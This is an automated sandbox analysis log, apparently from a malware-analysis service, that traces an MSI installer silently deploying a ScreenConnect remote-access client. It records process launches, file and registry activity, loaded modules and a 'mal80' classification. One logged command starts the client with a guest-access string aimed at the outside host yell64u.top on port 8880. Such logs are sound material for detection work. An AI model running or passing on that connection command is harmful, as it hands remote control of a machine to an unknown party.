                        Source: rundll32.exe, 00000003.00000003.1668960516.0000000004C81000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1669176626.0000000004B83000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1668960516.0000000004CF0000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.3.dr, Microsoft.Deployment.WindowsInstaller.dll.3.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.3.dr, Microsoft.Deployment.Compression.dll.3.drString found in binary or memory: http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v
                        Source: rundll32.exe, 00000003.00000003.1668960516.0000000004C81000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1669176626.0000000004B83000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1668960516.0000000004CF0000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.3.dr, Microsoft.Deployment.WindowsInstaller.dll.3.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.3.dr, Microsoft.Deployment.Compression.dll.3.drString found in binary or memory: http://wixtoolset.org/news/
                        Source: rundll32.exe, 00000003.00000003.1668960516.0000000004C81000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1669176626.0000000004B83000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1668960516.0000000004CF0000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.3.dr, Microsoft.Deployment.WindowsInstaller.dll.3.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.3.dr, Microsoft.Deployment.Compression.dll.3.drString found in binary or memory: http://wixtoolset.org/releases/
                        Source: ScreenConnect.ClientService.exe, 00000006.00000002.2909899483.0000000002777000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2909894070.00000000125EE000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1744539178.0000000012DF0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://www.digicert.com/CPS0
                        Source: ScreenConnect.WindowsCredentialProvider.dll.1.drString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
                        Source: ScreenConnect.Core.dll.3.drString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd

                        Spam, unwanted Advertisements and Ransom Demands

                        barindex
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 6_2_056B25C0 CreateProcessAsUserW,6_2_056B25C0
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\5c1175.msiJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{64D6109D-BB46-4239-08D9-EC110E53E92E}Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI15E9.tmpJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI160A.tmpJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI17FF.tmpJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\5c1177.msiJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\5c1177.msiJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{64D6109D-BB46-4239-08D9-EC110E53E92E}Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{64D6109D-BB46-4239-08D9-EC110E53E92E}\DefaultIconJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Installer\wix{64D6109D-BB46-4239-08D9-EC110E53E92E}.SchedServiceConfig.rmiJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (de5851ad6e374ce3)Jump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (de5851ad6e374ce3)\nfeecrl4.tmpJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (de5851ad6e374ce3)\nfeecrl4.newcfgJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.logJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI160A.tmpJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 6_2_056B00406_2_056B0040
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 6_2_056B00406_2_056B0040
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 7_2_00007FFD9B406FE87_2_00007FFD9B406FE8
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 7_2_00007FFD9B4010D77_2_00007FFD9B4010D7
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 7_2_00007FFD9B4010CF7_2_00007FFD9B4010CF
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 7_2_00007FFD9B715BC17_2_00007FFD9B715BC1
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 7_2_00007FFD9B7162837_2_00007FFD9B716283
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 7_2_00007FFD9B7100F27_2_00007FFD9B7100F2
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 7_2_00007FFD9B716C807_2_00007FFD9B716C80
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B4170BA8_2_00007FFD9B4170BA
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B4110CF8_2_00007FFD9B4110CF
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B4110D78_2_00007FFD9B4110D7
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B722B658_2_00007FFD9B722B65
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B7207908_2_00007FFD9B720790
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B725F168_2_00007FFD9B725F16
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B72E6C68_2_00007FFD9B72E6C6
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B7271858_2_00007FFD9B727185
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B72F4728_2_00007FFD9B72F472
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B7230518_2_00007FFD9B723051
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B7213308_2_00007FFD9B721330
                        Source: setup.msiBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs setup.msi
                        Source: setup.msiBinary or memory string: OriginalFilenameSfxCA.dllL vs setup.msi
                        Source: setup.msiBinary or memory string: OriginalFilenamewixca.dll\ vs setup.msi
                        Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, PopoutPanelTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                        Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ProgramTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                        Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, TaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                        Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                        Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                        Source: ScreenConnect.ClientService.dll.1.dr, WindowsLocalUserExtensions.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                        Source: classification engineClassification label: mal80.evad.winMSI@15/54@1/1
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)Jump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.logJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeMutant created: NULL
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSID3F.tmpJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                        Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSID3F.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6032843 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                        Source: setup.msiStatic file information: TRID: Microsoft Windows Installer (60509/1) 57.88%
                        Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\setup.msi"
                        Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding F119A6F073F792F7D0ECEED6C10FA13E C
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSID3F.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6032843 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 5DD10B1CF791748F5CDE2E7F0943941D
                        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding B2E11333BB1052CECFB49C593AC661A5 E Global\MSI0000
                        Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=yell64u.top&p=8880&s=c74b013c-c400-4ba6-a343-b7faf5e5e46a&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=DXBLeave&c=&c=&c=&c=&c=&c=&c="
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "c21e480d-13f5-4799-892b-1b4075726758" "User"
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "8bc7d613-b74f-4d66-a18a-de9574d5dc1b" "System"
                        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding F119A6F073F792F7D0ECEED6C10FA13E CJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 5DD10B1CF791748F5CDE2E7F0943941DJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding B2E11333BB1052CECFB49C593AC661A5 E Global\MSI0000Jump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSID3F.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6032843 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArgumentsJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "c21e480d-13f5-4799-892b-1b4075726758" "User"Jump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "8bc7d613-b74f-4d66-a18a-de9574d5dc1b" "System"Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: msihnd.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: version.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: amsi.dllJump to behavior
